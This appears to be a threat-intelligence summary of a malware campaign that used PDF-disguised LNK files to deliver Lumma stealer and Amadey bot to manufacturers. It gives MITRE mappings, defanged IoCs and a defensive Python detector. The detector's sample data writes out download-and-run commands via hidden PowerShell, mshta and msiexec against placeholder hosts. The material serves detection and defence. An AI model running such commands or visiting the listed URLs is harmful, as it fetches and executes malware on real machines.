Summary:
A recent cyberattack campaign targeting the manufacturing sector has been identified, utilizing a malicious LNK file disguised as a PDF. The attackers leverage various Living-off-the-Land Binaries and sophisticated evasion techniques to deploy the Lumma stealer and Amadey bot, aiming to exfiltrate sensitive information. #ManufacturingSecurity #MaliciousLNK #CyberThreats
Keypoints:
- Cyble Research and Intelligence Labs (CRIL) discovered a malicious campaign targeting the manufacturing industry.
- The attack uses a deceptive LNK file disguised as a PDF to initiate infection.
- Multiple Living-off-the-Land Binaries (LOLBins) are employed to bypass security mechanisms.
- Google Accelerated Mobile Pages (AMP) URLs are utilized to evade detection.
- File injection techniques are heavily relied upon to execute malicious payloads in memory.
- The attack chain includes DLL sideloading and the use of IDATLoader to deploy Lumma stealer and Amadey bot.
- The initial infection vector is suspected to be a spear-phishing email.
- Malicious PowerShell commands are executed to fetch and run additional payloads from remote servers.
- The campaign demonstrates increasing sophistication in cyberattack methodologies.
MITRE Techniques:
- Phishing (T1566): The LNK file may be delivered through phishing or spam emails.
- User Execution: Malicious Link (T1204.001): Execution begins when a user executes the LNK file.
- Command and Scripting Interpreter: PowerShell (T1059.001): The LNK file executes PowerShell commands.
- Masquerading: Masquerade File Type (T1036.008): Uses LNK files with altered icons to disguise them as legitimate documents.
- System Binary Proxy Execution: Mshta (T1218.005): Abuses mshta.exe to proxy execution of malicious files.
- Obfuscated Files or Information (T1027): Scripts include packed or encrypted data.
- System Binary Proxy Execution: Msiexec (T1218.007): msiexec.exe used for proxy execution of malicious payloads.
- DLL Side-Loading (T1574.002): Malicious DLL sideloaded.
- Process Injection (T1055): Injects malicious content into explorer.exe and other processes.
- Scheduled Task/Job (T1053.005): Adds task scheduler entry for persistence.
- Application Layer Protocol (T1071): Malware communicates to the C&C server.
- Automated Exfiltration (T1020): Data is exfiltrated after collection.
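The technique list above maps to a small set of host-side signals a defender can hunt for: a hidden-window PowerShell launch that pulls from a URL, mshta.exe and msiexec.exe invoked with remote resources, a Google AMP redirector URL in a command line, and a shortcut named like a document (.pdf.lnk). The following Python is an added example, not code from the Cyble report or from this summary; the Sysmon-style process-creation events, PIDs, paths and URLs it runs over are constructed sample data (the `example.invalid` hosts are placeholders, not campaign infrastructure), and the rule names are hypothetical. It walks each event's parent chain so that the proxy-execution sequence (PowerShell -> mshta -> msiexec) is reported as one finding rather than three unrelated alerts.

```python
import re

# Constructed Sysmon-style process-creation events (hypothetical sample data,
# not values from the report). ppid 1 stands in for a parent we never logged.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr https://www.google.ca/amp/s/example.invalid/x"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/stage2.hta"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i https://example.invalid/pkg.msi /qn"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe report.txt"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Google AMP redirector shape: google.<tld>/amp/s/<real destination host>
AMP_RE = re.compile(r"https?://(?:www\.)?google\.[a-z.]{2,6}/amp/s/", re.IGNORECASE)
LOLBINS = ("powershell.exe", "mshta.exe", "msiexec.exe")


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_masquerading_lnk(filename):
    """True for a shortcut whose name carries a document extension before .lnk."""
    name = filename.lower()
    return name.endswith(".lnk") and bool(re.search(r"\.(pdf|docx?|xlsx?)\.lnk$", name))


def check_event(ev):
    """Per-event rules; returns the list of hypothetical rule names that fired."""
    hits = []
    name = basename(ev["image"])
    cmd = ev["cmdline"]
    urls = URL_RE.findall(cmd)
    if name == "powershell.exe" and re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I) and urls:
        hits.append("powershell_hidden_download")
    if name == "mshta.exe" and urls:
        hits.append("mshta_remote_hta")
    if name == "msiexec.exe" and re.search(r"/i\s+https?://", cmd, re.I):
        hits.append("msiexec_remote_package")
    if any(AMP_RE.search(u) for u in urls):
        hits.append("google_amp_redirector")
    return hits


def lolbin_chain(ev, by_pid):
    """Walk the parent chain and return the LOLBins encountered, child first."""
    chain, cur, seen = [], ev, set()
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        if basename(cur["image"]) in LOLBINS:
            chain.append(basename(cur["image"]))
        cur = by_pid.get(cur["ppid"])
    return chain


def scan(events):
    """Return {pid: [rule, ...]} for every event that triggered at least one rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for ev in events:
        hits = check_event(ev)
        chain = lolbin_chain(ev, by_pid)
        # Two or more distinct LOLBins in one ancestry is the proxy-execution
        # sequence the report describes (PowerShell -> mshta -> msiexec).
        if len(set(chain)) >= 2:
            hits.append("lolbin_chain:" + "<-".join(chain))
        if hits:
            findings[ev["pid"]] = hits
    return findings


if __name__ == "__main__":
    print("Invoice.pdf.lnk masquerading:", is_masquerading_lnk("Invoice.pdf.lnk"))
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, rules)
```

On the sample data the explorer.exe and notepad.exe events stay silent, the PowerShell event fires the hidden-download and AMP rules, and the mshta and msiexec events each carry a chain finding naming their LOLBin ancestors. In production the same rules would run over real process telemetry (Sysmon Event ID 1 or an EDR's process tree), and the chain rule is the one that survives renaming of individual stages.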
IoC:
- [SHA-256] 5b6dc2ecb0f7f2e1ed759199822cb56f5b7bd993f3ef3dab0744c6746c952e36
- [SHA-256] 8ed1af83cf70b363658165a339f45ae22d92c51841b06c568049d3636a04a2a8
- [SHA-256] 7b8958ed2fc491b8e43ffb239cdd757ec3d0db038a6d6291c0fd6eb2d977adc4
- [SHA-256] dc36a3d95d9a476d773b961b15b188aa3aae0e0a875bca8857fca18c691ec250
- [URL] hxxps://www.google[.]ca/amp/s/goo.su/IwPQJP
- [URL] hxxps://pastebin[.]com/raw/0v6Vhvpb
- [URL] hxxps://berb.fitnessclub-filmfanatics[.]com/naailq0.cpl
- [URL] hxxp://download-695-18112-001-webdav-logicaldoc[.]cdn-serveri4732-ns.shop/Downloads/18112.2022/
Full Research: https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/